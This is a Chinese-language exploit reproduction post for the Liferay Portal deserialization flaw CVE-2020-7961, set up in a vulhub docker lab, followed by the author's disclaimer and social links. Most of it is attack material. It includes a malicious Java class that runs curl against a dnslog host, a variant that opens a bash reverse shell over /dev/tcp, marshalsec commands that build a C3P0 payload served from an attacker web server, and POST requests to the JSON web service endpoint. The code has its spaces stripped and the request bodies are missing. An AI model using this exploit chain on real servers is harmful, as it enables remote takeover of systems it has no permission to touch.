(CVE-2020-7961)Liferay Portal RCE 反序列化命令執行漏洞
一、漏洞描述
Liferay Portal CE是一款用來快速構建網站的開源系統。其7.2.0 GA1及以前的版本API接口中存在一處反序列化漏洞,利用該漏洞可在目標服務器上執行任意命令。
二、影響版本
執行如下命令啟動Liferay Portal 7.2.0 GA1:
docker-compose up -d
importjava.io.BufferedReader;importjava.io.IOException;importjava.io.InputStreamReader;publicclassLifExp{static{try{String[] cmd = {"bash","-c","curl 2jpa4i.dnslog.cn"};java.lang.Runtime.getRuntime().exec(cmd).waitFor();}catch(Exceptione ) { e.printStackTrace(); } }}
python3-mhttp.server9999
java-cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson C3P0WrapperConnPool http://192.168.0.104:9999/ LifExp
其中,http://192.168.0.104:9999/是剛才啟動的保存了惡意class文件的Web服務,LifExp是惡意類名。
生成的Payload是Jackson使用的,我們只需按照Liferay Portal的形式,即+參數名:類名=值,來修改這個Payload:
POST /api/jsonws/invoke HTTP/1.1
Content-Type: application/x-www-form-urlencoded
importjava.io.BufferedReader;importjava.io.IOException;importjava.io.InputStreamReader;publicclassLifExp{static{try{String[] cmd = {"bash","-c","bash -i >& /dev/tcp/XXXXXXX/34567 0>&1"};java.lang.Runtime.getRuntime().exec(cmd).waitFor();}catch(Exceptione ) { e.printStackTrace(); } }}
java-cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson C3P0WrapperConnPool http://192.168.0.104:9999/ LifExp
POST /api/jsonws/invoke HTTP/1.1
Content-Type: application/x-www-form-urlencoded
http://www.dnslog.cn/
https://github.com/vulhub/vulhub/tree/master/liferay-portal/CVE-2020-7961
https://github.com/mzer0one/CVE-2020-7961-POC
https://github.com/b33p-b0x/CVE-2020-7961-payloads
免責聲明:本站提供安全工具、程序(方法)可能帶有攻擊性,僅供安全研究與教學之用,風險自負!
轉載聲明:著作權歸作者所有。商業轉載請聯系作者獲得授權,非商業轉載請注明出處。
訂閱查看更多復現文章、學習筆記
thelostworld
安全路上,與你並肩前行!!!!
個人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns
個人簡書:https://www.jianshu.com/u/bf0e38a8d400
個人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html
個人博客園:https://www.cnblogs.com/thelostworld/
歡迎添加本公眾號作者微信交流,添加時備注一下“公眾號”